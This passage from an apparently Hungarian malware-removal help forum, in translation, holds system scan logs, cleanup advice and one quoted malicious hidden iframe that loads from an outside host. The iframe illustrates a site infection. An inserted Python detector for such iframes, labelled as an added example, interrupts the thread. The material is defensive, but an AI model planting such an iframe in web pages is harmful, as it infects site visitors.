R2 thdudf;TOSHIBA UDF2.5 Reader File System Driver; C:\WINDOWS\system32\DRIVERS\thdudf.sys [2006-11-11 66944]
R2 tifsfilter;Acronis True Image FS Filter; C:\WINDOWS\system32\DRIVERS\tifsfilt.sys [2008-03-10 44384]
R3 AmdLLD;AMD Low Level Device Driver; C:\WINDOWS\system32\DRIVERS\AmdLLD.sys [2007-06-29 34304]
R3 Arp1394;1394 ARP ügyfélprotokoll; C:\WINDOWS\system32\DRIVERS\arp1394.sys [2004-08-18 60800]
R3 ASAPIW2K;ASAPIW2K; C:\WINDOWS\System32\Drivers\ASAPIW2K.sys [2005-02-23 11264]
R3 asusgsb;ASUS Virtual Video Capture Device Driver; C:\WINDOWS\system32\drivers\asusgsb.sys [2007-10-23 12416]
R3 aswRdr;aswRdr; C:\WINDOWS\system32\drivers\aswRdr.sys [2009-02-05 23152]
R3 ati2mtag;ati2mtag; C:\WINDOWS\system32\DRIVERS\ati2mtag.sys [2009-03-16 3597312]
R3 AtiHdmiService;ATI Function Driver for HDMI Service; C:\WINDOWS\system32\drivers\AtiHdmi.sys [2009-02-26 99856]
R3 cFosSpeed;cFosSpeed Miniport; C:\WINDOWS\system32\DRIVERS\cfosspeed.sys [2007-10-17 707024]
R3 ElbyCDFL;ElbyCDFL; C:\WINDOWS\System32\Drivers\ElbyCDFL.sys [2007-02-16 34760]
R3 FET5X86V;VIA Rhine-Family Fast-Ethernet Adapter Driver Service; C:\WINDOWS\system32\DRIVERS\fetnd5bv.sys [2007-04-17 42496]
R3 GearAspiWDM;GEARAspiWDM; C:\WINDOWS\system32\drivers\gearaspiwdm.sys [2006-11-14 15664]
R3 HDAudBus;Microsoft UAA Bus Driver for High Definition Audio; C:\WINDOWS\system32\DRIVERS\HDAudBus.sys [2005-01-07 138752]
R3 hidusb;Microsoft HID osztályú illesztőprogram; C:\WINDOWS\system32\DRIVERS\hidusb.sys [2004-08-18 9600]
R3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\WINDOWS\system32\drivers\RtkHDAud.sys [2007-02-03 4474368]
R3 LVCap138;TV Card Capture Driver; C:\WINDOWS\system32\DRIVERS\tvcap.sys [2004-09-20 308736]
R3 lvtuner;Mercury TV Card WDM TV Tuner; C:\WINDOWS\system32\DRIVERS\tvtuner.sys [2004-09-20 16512]
R3 MarvinBus;Pinnacle Marvin Bus; C:\WINDOWS\system32\DRIVERS\MarvinBus.sys [2005-06-02 171008]
R3 MTsensor;ATK0110 ACPI UTILITY; C:\WINDOWS\system32\DRIVERS\ASACPI.sys [2004-08-14 5810]
R3 NIC1394;1394 hálózati illesztőprogram; C:\WINDOWS\system32\DRIVERS\nic1394.sys [2004-08-18 61824]
R3 pcouffin;VSO Software pcouffin; C:\WINDOWS\System32\Drivers\pcouffin.sys [2008-03-03 47360]
R3 tbhsd;Tunebite High-Speed Dubbing; C:\WINDOWS\system32\drivers\tbhsd.sys [2008-11-04 43552]
R3 ULCDRHlp;ULCDRHlp; C:\WINDOWS\System32\Drivers\ULCDRHlp.sys [2004-12-23 27392]
R3 usbccgp;Microsoft USB általános szülő-illesztőprogram; C:\WINDOWS\system32\DRIVERS\usbccgp.sys [2004-08-04 31616]
R3 usbehci;Microsoft USB 2.0 bővített állomásvezérlő miniport illesztőprogramja; C:\WINDOWS\system32\DRIVERS\usbehci.sys [2004-08-18 26624]
R3 usbhub;Microsoft USB szabványos hub-illesztőprogram; C:\WINDOWS\system32\DRIVERS\usbhub.sys [2004-08-18 57600]
R3 usbprint;Microsoft USB PRINTER osztály; C:\WINDOWS\system32\DRIVERS\usbprint.sys [2004-08-04 25856]
R3 usbscan;USB-képolvasó illesztőprogramja; C:\WINDOWS\system32\DRIVERS\usbscan.sys [2004-08-03 15104]
R3 usbuhci;Microsoft USB univerzális állomásvezérlő miniport illesztőprogramja; C:\WINDOWS\system32\DRIVERS\usbuhci.sys [2004-08-18 20480]
R3 Video3D;ASUS Video3D Service; C:\WINDOWS\System32\Drivers\Video3D32.sys [2007-10-23 10752]
S2 PStrip;PSTRIP; \??\C:\WINDOWS\system32\DRIVERS\PSTRIP.SYS []
S2 SOFTLOK;SOFTLOK; C:\WINDOWS\system32\drivers\SOFTLOK.sys []
S3 a22bl5ef;a22bl5ef; C:\WINDOWS\system32\drivers\a22bl5ef.sys []
S3 a40c7wab;a40c7wab; C:\WINDOWS\system32\drivers\a40c7wab.sys []
S3 agir9xyh;agir9xyh; C:\WINDOWS\system32\drivers\agir9xyh.sys []
S3 al3tbqf1;al3tbqf1; C:\WINDOWS\system32\drivers\al3tbqf1.sys []
S3 CCDECODE;Feliratdekódoló; C:\WINDOWS\system32\DRIVERS\CCDECODE.sys [2004-08-04 17024]
S3 FETNDIS;VIA PCI 10/100Mb Fast Ethernet adapter NT-illesztőprogramja; C:\WINDOWS\system32\DRIVERS\fetnd5.sys [2001-08-17 27165]
S3 HdAudAddService;ATI Function Driver for High Definition Audio Service; C:\WINDOWS\system32\drivers\AtiHdAud.sys [2006-12-28 84992]
S3 mbr;mbr; \??\C:\DOCUME~1\PALI\LOCALS~1\Temp\mbr.sys []
S3 MSTEE;Microsoft Streaming Tee/Sink - Sink átalakító; C:\WINDOWS\system32\drivers\MSTEE.sys [2004-08-03 5504]
S3 NABTSFEC;NABTS/FEC VBI kodek; C:\WINDOWS\system32\DRIVERS\NABTSFEC.sys [2004-08-04 85376]
S3 NdisIP;Microsoft TV-/videokapcsolat; C:\WINDOWS\system32\DRIVERS\NdisIP.sys [2004-08-04 10880]
S3 PCANDIS5;PCANDIS5; \??\C:\PROGRA~1\MATVAD~1\PCANDIS5.SYS []
S3 RkPavproc1;RkPavproc1; \??\C:\WINDOWS\system32\drivers\RkPavproc1.sys []
S3 SASENUM;SASENUM; \??\C:\Program Files\SUPERAntiSpyware\SASENUM.SYS []
S3 SLIP;BDA Slip De-Framer; C:\WINDOWS\system32\DRIVERS\SLIP.sys [2004-08-04 11136]
S3 SndTAudio;SndTAudio; C:\WINDOWS\system32\drivers\SndTAudio.sys [2009-02-03 23096]
S3 SndTVideo;SndTVideo; C:\WINDOWS\system32\DRIVERS\SndTVideo.sys [2009-02-03 3768]
S3 streamip;BDA IPSink; C:\WINDOWS\system32\DRIVERS\StreamIP.sys [2004-08-04 15360]
S3 SymIM;Symantec Network Security Intermediate Filter Service; C:\WINDOWS\system32\DRIVERS\SymIM.sys []
S3 SymIMMP;SymIMMP; C:\WINDOWS\system32\DRIVERS\SymIM.sys []
S3 TNPacket;T-Systems Nova Packet Capture Driver; \??\C:\PROGRA~1\MATVAD~1\TNPACKET.SYS []
S3 USBSTOR;USB háttértár illesztőprogramja; C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS [2004-08-04 26496]
S3 WSTCODEC;World Standard Teletext kodek; C:\WINDOWS\system32\DRIVERS\WSTCODEC.SYS [2004-08-04 19328]
S3 WudfPf;Windows Driver Foundation - User-mode Driver Framework Platform Driver; C:\WINDOWS\system32\DRIVERS\WudfPf.sys [2006-09-28 77568]
S3 WudfRd;Windows Driver Foundation - User-mode Driver Framework Reflector; C:\WINDOWS\system32\DRIVERS\wudfrd.sys [2006-09-28 82944]
S4 IntelIde;IntelIde; C:\WINDOWS\system32\drivers\IntelIde.sys []
S4 sr;Rendszer-helyreállító szűrő illesztőprogramja; C:\WINDOWS\system32\DRIVERS\sr.sys [2004-08-18 73472]
S4 WS2IFSL;Windows Socket 2.0 - nem IFS-t szolgáltató támogatási környezet; C:\WINDOWS\System32\drivers\ws2ifsl.sys [2004-08-18 12032]

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 AcrSch2Svc;Acronis Scheduler2 Service; C:\Program Files\Common Files\Acronis\Schedule2\schedul2.exe [2007-09-14 427288]
R2 aswUpdSv;avast! iAVS4 Control Service; C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe [2009-02-05 18752]
R2 ATKKeyboardService;ATK Keyboard Service; C:\WINDOWS\ATKKBService.exe [2007-10-23 262144]
R2 avast! Antivirus;avast! Antivirus; C:\Program Files\Alwil Software\Avast4\ashServ.exe [2009-02-05 138680]
R2 cFosSpeedS;cFosSpeed System Service; C:\Program Files\cFosSpeed\spd.exe [2007-10-17 310224]
R2 CmdAgent;Comodo Application Agent; C:\Program Files\Comodo\Firewall\cmdagent.exe [2009-06-18 361040]
R2 Diskeeper;Diskeeper; C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe [2007-10-16 1094936]
R2 JavaQuickStarterService;Java Quick Starter; C:\Program Files\Java\jre6\bin\jqs.exe [2009-01-14 152984]
R2 LightScribeService;LightScribeService Direct Disc Labeling Service; C:\Program Files\Common Files\LightScribe\LSSrvc.exe [2006-10-19 61440]
R2 LvHidSvc;Remote HID Service; C:\WINDOWS\system32\lvhidsvc.exe [2004-03-25 32256]
R2 MDM;Machine Debug Manager; C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE [2003-06-20 322120]
R2 nlsvc;NetLimiter; C:\Program Files\NetLimiter 2 Pro\nlsvc.exe [2007-03-21 516096]
R2 NMSAccessU;NMSAccessU; C:\Program Files\CDBurnerXP\NMSAccessU.exe [2008-03-09 71096]
R2 Pml Driver HPZ12;Pml Driver HPZ12; C:\WINDOWS\system32\HPZipm12.exe [2006-03-03 69632]
R2 sdAuxService;PC Tools Auxiliary Service; C:\Program Files\Spyware Doctor\pctsAuxs.exe [2009-01-07 348752]
R2 sdCoreService;PC Tools Security Service; C:\Program Files\Spyware Doctor\pctsSvc.exe [2009-01-21 1095560]
R2 TryAndDecideService;Acronis Try And Decide Service; C:\Program Files\Common Files\Acronis\Fomatik\TrueImageTryStartService.exe [2007-09-14 492600]
R2 UleadBurningHelper;Ulead Burning Helper; C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe [2007-01-18 67056]
R2 VC5SecS;Virtual CD v5 Security service; C:\Program Files\HHVcdV5Sys\VC5SecS.exe [2003-11-07 147456]
R3 avast! Mail Scanner;avast! Mail Scanner; C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe [2009-02-05 254040]
R3 lxcc_device;lxcc_device; C:\WINDOWS\system32\lxcccoms.exe [2005-07-06 466944]
S02000000 OMSCAN;OMSCAN; \Sys []
S2 Ati HotKey Poller;Ati HotKey Poller; C:\WINDOWS\system32\Ati2evxx.exe [2009-03-16 602112]
S3 Adobe LM Service;Adobe LM Service; C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [2009-02-05 72704]
S3 aspnet_state;ASP.NET-állapotszolgáltatás; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [2008-07-25 34312]
S3 avast! Web Scanner;avast! Web Scanner; C:\Program Files\Alwil Software\Avast4\ashWebSv.exe [2009-02-05 352920]
S3 clr_optimization_v2.0.50727_32;.NET Runtime Optimization Service v2.0.50727_X86; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe [2008-07-25 69632]
S3 FontCache3.0.0.0;Windows Presentation Foundation Font Cache 3.0.0.0; C:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe [2008-07-29 46104]
S3 IDriverT;InstallDriver Table Manager; C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [2005-04-04 69632]
S3 idsvc;Windows CardSpace; c:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe [2008-07-29 881664]
S3 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2003-07-28 89136]
S3 WudfSvc;Windows Driver Foundation - User-mode Driver Framework; C:\WINDOWS\system32\svchost.exe [2004-08-18 14336]
S4 NetTcpPortSharing;Net.Tcp portmegosztási szolgáltatás; c:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe [2008-07-29 132096]

-----------------EOF-----------------


Fri Jun 19, 2009 11:21
gold member

Joined: Thu Jan 01, 2009 20:34
Posts: 294
Post
ok, I'll do it ..... this afternoon, regards


Fri Jun 19, 2009 9:07
the soul of the forum

Joined: Sun Jun 24, 2007 10:18
Posts: 6679
Location: Revuca.S.k>>Slovakia, I can't write Hungarian well, that's why what you see looks like this,
Post
:D :D hi
I'll only have time in the afternoon, around 4-5 o'clock, but until then run the RSIT program and post its log, log.txt, here
http://images.malwareremoval.com/random/RSIT.exe
run it - click - continue ,,,


Fri Jun 19, 2009 8:16
gold member

Joined: Thu Jan 01, 2009 20:34
Posts: 294
Post
Hi stell, so glad you're still around .... in December and January we did a lot of cleaning on my machine, and now I've got something again: my net connection keeps dropping with a Gen Host Proc error, and Spyware Doctor keeps finding lots of browser worms, so something has settled in on my machine ..... help; Avast often reports some kind of DHCP intrusion attempt, and I have the Comodo firewall .... awaiting your instructions :)


Fri Jun 19, 2009 7:40
the soul of the forum

Joined: Sun Jun 24, 2007 10:18
Posts: 6679
Location: Revuca.S.k>>Slovakia, I can't write Hungarian well, that's why what you see looks like this,
Post
yes, just as I wrote, it's the website owner's fault, not yours,,


Thu Jun 18, 2009 17:41
silver member

Joined: Tue Feb 24, 2009 11:19
Posts: 25
Post
Yes, avast reported that the page is infected with the Ilframe.inf virus.


Thu Jun 18, 2009 17:06
the soul of the forum

Joined: Sun Jun 24, 2007 10:18
Posts: 6679
Location: Revuca.S.k>>Slovakia, I can't write Hungarian well, that's why what you see looks like this,
Post
Yes, this is the hit right now: they steal the password through TC from anyone who uses it as an FTP client > they broke the encryption,, in TC.
The situation here is that nowadays almost every website is infected; this isn't just about porn, warez and similar grey sites but about legitimate sites. The website owner should clean it up, because the page is certainly infected; your machine is fine, because avast knows this virus. We've already written about this here
Code:
<iframe src="http://mixante.cn/in.cgi?income54" width=1 height=1 style="visibility: hidden"></iframe>

this is the kind of thing it's about
regards,


Thu Jun 18, 2009 16:31
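The hidden-iframe injection shown in the post above, turned into a check a site owner could run over their own pages. This is an added example, not code from the thread; the sample HTML, the `example.*` hosts and the function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Constructed sample page (not from the thread); hosts use reserved example names.
SAMPLE_HTML = """
<html><body>
<h1>Club news</h1>
<iframe src="/widgets/calendar.html" width="400" height="300"></iframe>
<iframe src="http://video.example.org/embed/42" width="560" height="315"></iframe>
<iframe src="http://tracker.example.net/in.cgi?x1" width=1 height=1 style="visibility: hidden"></iframe>
<IFRAME SRC="//ads.example.net/f" style="display:none"></IFRAME>
<iframe src="http://cdn.example.net/p" style="width:0px; height:0px; border:0"></iframe>
</body></html>
"""


def _px(value):
    """Return the leading integer of a size such as '1' or '0px', else None."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def _style_map(style):
    """Parse an inline style attribute into a lower-cased {property: value} dict."""
    out = {}
    for decl in (style or "").split(";"):
        if ":" in decl:
            prop, val = decl.split(":", 1)
            out[prop.strip().lower()] = val.strip().lower()
    return out


class IframeAuditor(HTMLParser):
    """Collect iframes that are both invisible to the visitor and off-site."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":  # HTMLParser already lower-cases tag names
            return
        a = {k: (v or "") for k, v in attrs}
        style = _style_map(a.get("style"))
        reasons = []
        # A frame is effectively invisible if either the attribute or the
        # inline style shrinks a dimension to 0 or 1 pixel.
        for dim in ("width", "height"):
            sizes = (_px(a.get(dim)), _px(style.get(dim)))
            if any(s is not None and s <= 1 for s in sizes):
                reasons.append(f"{dim}<=1")
        if style.get("visibility") == "hidden":
            reasons.append("visibility:hidden")
        if style.get("display") == "none":
            reasons.append("display:none")
        # Relative URLs have no hostname and count as same-site.
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        external = bool(host) and host != self.site_host
        if reasons and external:
            self.findings.append(
                {"host": host, "src": a.get("src", ""), "reasons": reasons}
            )


def audit_html(html, site_host):
    """Return one finding per hidden iframe that loads from another host."""
    auditor = IframeAuditor(site_host)
    auditor.feed(html)
    auditor.close()
    return auditor.findings


def suspicious_hosts(findings):
    """Sorted, de-duplicated hosts to look for in templates and FTP upload logs."""
    return sorted({f["host"] for f in findings})


if __name__ == "__main__":
    for f in audit_html(SAMPLE_HTML, "www.example.org"):
        print(f["host"], f["src"], ", ".join(f["reasons"]))
```

A visible embed from another host (the video frame in the sample) is not reported; only frames that combine an off-site source with a hiding technique are.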
silver member

Joined: Tue Feb 24, 2009 11:19
Posts: 25
Post
It didn't get onto my machine, because avast blocked it and reported that the connection was aborted. After that I ran several scanners and removers (avast, Spyware Terminator, Malwarebytes Anti-Malware), but none of them found anything. For a firewall I have Outpost installed; I hope that's good enough. What bothers me is that every time the page loads, avast screams that there's a virus. I'm afraid it will do some damage, so I don't even dare open the page.


Thu Jun 18, 2009 11:30
the soul of the forum

Joined: Sun Sep 12, 2004 18:08
Posts: 6037
Location: Usa
Post
Wipe out the worm, and afterwards install a proper firewall that alerts you if anything from the page tries to download without your knowledge.


Thu Jun 18, 2009 1:37
silver member

Joined: Tue Feb 24, 2009 11:19
Posts: 25
Post
There's a site I visit every day. Until now there was no problem with it, and for about 2 days avast has been reporting a worm. What can be done about this?


Wed Jun 17, 2009 21:47
the soul of the forum

Joined: Sun Jun 24, 2007 10:18
Posts: 6679
Location: Revuca.S.k>>Slovakia, I can't write Hungarian well, that's why what you see looks like this,
Post
okay, then I think it's fine, if there are no other problems left
regards


Thu Jun 04, 2009 10:24
platinum member

Joined: Wed Mar 24, 2004 13:43
Posts: 595
Post
stell wrote:
2/40 is ok
aha, combofix also took something out,,, and when you have time run the WEBCUREIT program in safe mode, cure whatever it finds; if it finds something, post the name of the infection here,, you can remove combofix from the machine
start - run - type combofix /u ok,
Clean up with CCleaner
and then we'll see,


I cleaned it with Webcureit; it found 4 infections, but I forgot them :oops: and, like someone who'd done a good job, I uninstalled the program too. :cry:
Interestingly, after this, after a restart, Eset again found a New Heur_PE virus, some tmp file. It wiped it out, nothing since.


Thu Jun 04, 2009 8:39
the soul of the forum

Joined: Sun Jun 24, 2007 10:18
Posts: 6679
Location: Revuca.S.k>>Slovakia, I can't write Hungarian well, that's why what you see looks like this,
Post
2/40 is ok
aha, combofix also took something out,,, and when you have time run the WEBCUREIT program in safe mode, cure whatever it finds; if it finds something, post the name of the infection here,, you can remove combofix from the machine
start - run - type combofix /u ok,
Clean up with CCleaner
and then we'll see,


Sat May 30, 2009 20:54
platinum member

Joined: Wed Mar 24, 2004 13:43
Posts: 595
Post
stell wrote:
c:\windows\system32\RunOnceEx.exe
test it on Virustotal,
VIRUSTOTALu


The first result was 2/40 (TrojanSpy or something like that,
http://www.virustotal.com/hu/analisis/2 ... 1240033083
on the second, repeated scan it was 1/40, Medium Risk Malware.
http://www.virustotal.com/hu/analisis/2 ... 1243712744
So how should this be interpreted?

I didn't even mention that this morning I already ran Eset SS, result, Spybot S&D result 4 somethings wiped out, Malwarebyte found 4.


This post has been edited 1 time, last by AGyurma on Sat May 30, 2009 20:56.



Sat May 30, 2009 20:40
the soul of the forum

Joined: Sun Jun 24, 2007 10:18
Posts: 6679
Location: Revuca.S.k>>Slovakia, I can't write Hungarian well, that's why what you see looks like this,
Post
c:\windows\system32\RunOnceEx.exe
test it on Virustotal,
VIRUSTOTALu


Sat May 30, 2009 20:22
platinum member

Joined: Wed Mar 24, 2004 13:43
Posts: 595
Post
ComboFix 09-05-30.03 - Rendszergazda 009.05.30. 20:37.1 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.3.1250.36.1038.18.256.50 [GMT 2:00]
Running from: c:\documents and settings\Rendszergazda\Asztal\ComboFix.exe
AV: ESET Smart Security 3.0 *On-access scanning enabled* (Updated) {E5E70D32-0101-4F12-8FB0-D96ACA4F34C0}
FW: ESET Személyi tűzfal *enabled* {E5E70D32-0101-4340-86A3-A7B0F1C8FFE0}
* Resident AV is active


WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

c:\documents and settings\All Users\Start Menu\Programs\Internet Explorer.lnk
c:\documents and settings\Rendszergazda\Application Data\inst.exe
c:\windows\system32\lsprst7.dll
c:\windows\system32\ssprs.dll
c:\windows\system32\tmp14.tmp

.
((((((((((((((((((((((((( Files Created from 2009-04-28 to 2009-05-30 )))))))))))))))))))))))))))))))
.

2009-05-30 17:09 . 2009-05-30 17:09 -------- d-----w c:\program files\Trend Micro
2009-05-30 10:27 . 2008-10-16 12:09 43544 ----a-w c:\windows\system32\wups2.dll
2009-05-29 21:43 . 2009-05-29 21:43 -------- d-----w c:\documents and settings\Rendszergazda\Application Data\Malwarebytes
2009-05-29 21:43 . 2009-05-29 21:43 -------- d-----w c:\documents and settings\All Users\Application Data\Malwarebytes
2009-05-29 21:39 . 2009-05-29 21:39 -------- d-----w c:\documents and settings\Rendszergazda\Application Data\Auslogics
2009-05-29 21:36 . 2009-05-30 05:53 -------- d---a-w c:\documents and settings\All Users\Application Data\TEMP
2009-05-29 21:36 . 2009-05-29 21:36 -------- d-----w c:\program files\Acelogix
2009-05-29 20:58 . 2009-05-30 08:12 -------- d-----w c:\documents and settings\All Users\Application Data\Spybot - Search & Destroy
2009-05-29 19:59 . 2009-05-29 19:59 -------- d-----w c:\documents and settings\Rendszergazda\Application Data\Foxit
2009-05-29 19:59 . 2009-05-29 19:59 -------- d-----w c:\program files\Foxit Software
2009-05-29 19:31 . 2008-08-31 19:47 238592 ----a-w c:\windows\system32\JkDefragScreenSaver.exe
2009-05-29 19:31 . 2008-08-31 19:47 98304 ----a-w c:\windows\system32\JkDefragScreenSaver.scr
2009-05-29 19:00 . 2009-05-29 19:01 -------- d-----w c:\program files\CCleaner
2009-05-06 17:46 . 2009-05-06 17:46 -------- d-----w c:\documents and settings\Rendszergazda\Application Data\Hewlett-Packard
2009-05-06 17:29 . 2009-05-06 17:29 82380 ----a-w c:\windows\system32\drivers\AFS2K.SYS
2009-05-06 17:11 . 2009-05-06 17:30 20807 ----a-w c:\windows\HPHins02.dat
2009-05-06 17:11 . 2004-01-16 20:56 4308 ------w c:\windows\hphmdl02.dat
2009-05-06 17:07 . 2009-05-06 17:07 -------- d-----w c:\windows\system32\NtmsData
2009-05-06 16:55 . 2003-12-11 09:15 626960 ----a-r c:\windows\system32\hpvaut32.dll
2009-05-06 16:55 . 2003-12-11 09:15 487424 ----a-r c:\windows\system32\hpvcp70.dll
2009-05-06 16:55 . 2003-12-11 09:15 344064 ----a-r c:\windows\system32\hpvcr70.dll
2009-05-06 16:54 . 2009-05-06 16:55 -------- d-----w c:\program files\HP
2009-05-06 16:54 . 2004-03-18 14:56 204800 ----a-w c:\windows\system32\HPZipr12.dll
2009-05-06 16:54 . 2004-03-18 14:55 65536 ----a-w c:\windows\system32\HPZipm12.exe
2009-05-06 16:54 . 2004-03-18 14:53 278584 ----a-w c:\windows\system32\HPZidr12.dll
2009-05-06 16:54 . 2004-03-18 14:39 57344 ----a-w c:\windows\system32\HPZisn12.dll
2009-05-06 16:54 . 2004-03-18 14:39 94208 ----a-w c:\windows\system32\HPZipt12.dll
2009-05-06 16:54 . 2004-03-18 14:38 61440 ----a-w c:\windows\system32\HPZinw12.exe
2009-05-06 16:54 . 1998-10-29 14:45 306688 ----a-w c:\windows\IsUninst.exe
2009-05-06 16:52 . 2009-05-29 19:17 -------- d-----w c:\documents and settings\All Users\Application Data\Comodo
2009-05-06 16:51 . 2009-05-29 19:33 -------- d-----w c:\program files\COMODO
2009-05-06 16:41 . 2009-05-29 19:59 -------- d-----w c:\program files\Hewlett-Packard
2009-05-06 16:41 . 2005-07-08 04:55 51088 ----a-w c:\windows\system32\drivers\hpzid412.sys
2009-05-06 16:41 . 2005-07-08 04:55 21744 ----a-w c:\windows\system32\drivers\HPZius12.sys
2009-05-06 16:41 . 2005-07-08 04:55 16496 ----a-w c:\windows\system32\drivers\HPZipr12.sys
2009-05-06 16:40 . 2005-07-08 04:55 270336 ----a-w c:\windows\system32\HPZc3212.dll
2009-05-06 16:40 . 2003-12-04 23:15 258048 ----a-w c:\windows\system32\hpzcon09.dll
2009-05-06 16:40 . 2003-12-04 23:21 135224 ----a-w c:\windows\system32\hpzlnt09.dll
2009-05-06 16:40 . 2003-12-04 23:14 192512 ----a-w c:\windows\system32\hpzcoi09.dll

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-05-30 18:33 . 2008-11-01 09:23 66 ----a-w c:\windows\runonceex.bat
2009-05-30 08:46 . 2008-11-01 09:41 -------- d-----w c:\program files\VideoLAN
2009-05-30 06:37 . 2004-08-18 12:00 90984 ----a-w c:\windows\system32\perfc00E.dat
2009-05-30 06:37 . 2004-08-18 12:00 409256 ----a-w c:\windows\system32\perfh00E.dat
2009-05-29 21:25 . 2008-11-01 09:43 -------- d-----w c:\program files\Paint.NET
2009-05-29 21:21 . 2008-11-01 09:41 -------- d-----w c:\program files\Mozilla Thunderbird
2009-05-29 20:48 . 2008-11-01 09:46 -------- d-----w c:\program files\ESET
2009-05-29 20:00 . 2008-11-02 20:21 -------- d-----w c:\program files\Logitech
2009-05-29 19:29 . 2008-11-01 09:31 -------- d-----w c:\program files\Opera
2009-05-29 19:28 . 2008-11-01 09:30 -------- d-----w c:\program files\Elaborate Bytes
2009-05-29 19:27 . 2008-11-01 09:30 -------- d-----w c:\program files\SlySoft
2009-05-29 19:27 . 2008-11-01 09:20 -------- d-----w c:\program files\CMenu
2009-05-29 19:26 . 2008-11-01 09:19 -------- d-----w c:\program files\Unlocker
2009-05-29 19:26 . 2008-11-01 09:42 -------- d-----w c:\program files\Winamp
2009-05-29 19:25 . 2008-11-01 09:32 -------- d-----w c:\program files\TC PowerPack
2009-05-29 19:24 . 2008-11-01 09:34 -------- d-----w c:\program files\Notepad++
2009-05-29 19:24 . 2008-11-01 09:49 -------- d-----w c:\program files\GameHouse
2009-05-29 19:22 . 2008-11-01 09:36 -------- d--h--w c:\program files\InstallShield Installation Information
2009-05-29 19:17 . 2008-11-01 09:45 -------- d-----w c:\documents and settings\Rendszergazda\Application Data\Vso
2009-05-29 19:17 . 2008-11-01 09:45 47360 -c--a-w c:\documents and settings\Rendszergazda\Application Data\pcouffin.sys
2009-05-29 19:17 . 2008-11-01 09:45 47360 -c--a-w c:\documents and settings\Rendszergazda\Application Data\pcouffin.sys
2009-05-29 19:16 . 2008-11-01 09:41 -------- d-----w c:\program files\ApexDC++
2009-05-29 19:05 . 2008-11-02 19:43 -------- d-----w c:\program files\Maxthon2
2009-05-29 19:04 . 2008-11-01 09:42 -------- d-----w c:\program files\FlashGet
2009-05-29 13:06 . 2008-11-02 19:44 -------- d-----w c:\documents and settings\Rendszergazda\Application Data\MxBoost
2009-04-23 15:56 . 2009-04-23 15:56 1025 ----a-w c:\windows\system32\clauth2.dll
2009-04-23 15:56 . 2009-04-23 15:56 1025 ----a-w c:\windows\system32\clauth1.dll
2009-04-23 15:56 . 2009-04-23 15:56 1025 ----a-w c:\windows\system32\sysprs7.dll
2009-04-23 15:56 . 2009-04-23 15:56 -------- d-----w c:\documents and settings\All Users\Application Data\hps
2009-04-23 15:51 . 2009-04-23 15:51 -------- d-----w c:\program files\Rossmann
2008-06-28 10:57 . 2008-11-01 09:45 6602240 ----a-w c:\program files\mplayercHC.exe
2008-06-28 10:25 . 2008-11-01 09:45 400896 -c--a-w c:\program files\mpcresources.hu.dll
2008-06-12 17:21 . 2008-11-01 09:42 4341760 ----a-w c:\program files\mplayerc.exe
2008-01-13 19:00 . 2008-11-01 09:23 545792 -csha-w c:\windows\system32\RunOnceEx.exe
.

((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"msnmsgr"="c:\program files\Windows Live\Messenger\msnmsgr.exe" [2007-10-18 5724184]
"ctfmon.exe"="c:\windows\system32\ctfmon.exe" [2008-04-14 15360]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"egui"="c:\program files\ESET\ESET Smart Security\egui.exe" [2008-10-24 1451264]
"Alternative RunOnceEx by Ruby Software"="c:\windows\system32\RunOnceEx.exe" [2008-01-13 545792]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2008-04-14 15360]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"AfterPost"="c:\windows\afterpost2.cmd" [2008-08-07 1388]

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer]
"NoStrCmpLogical"= 1 (0x1)
"ForceCopyAclwithFile"= 0 (0x0)

[HKEY_USERS\.default\software\microsoft\windows\currentversion\policies\explorer]
"NoStrCmpLogical"= 1 (0x1)
"ForceCopyAclwithFile"= 0 (0x0)

HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32
"MIDI1"= SYNCOR11.DLL

[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Start Menu^Programs^Indítópult^Logitech Desktop Messenger.lnk]
path=c:\documents and settings\All Users\Start Menu\Programs\Indítópult\Logitech Desktop Messenger.lnk
backup=c:\windows\pss\Logitech Desktop Messenger.lnkCommon Startup
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Cmaudio
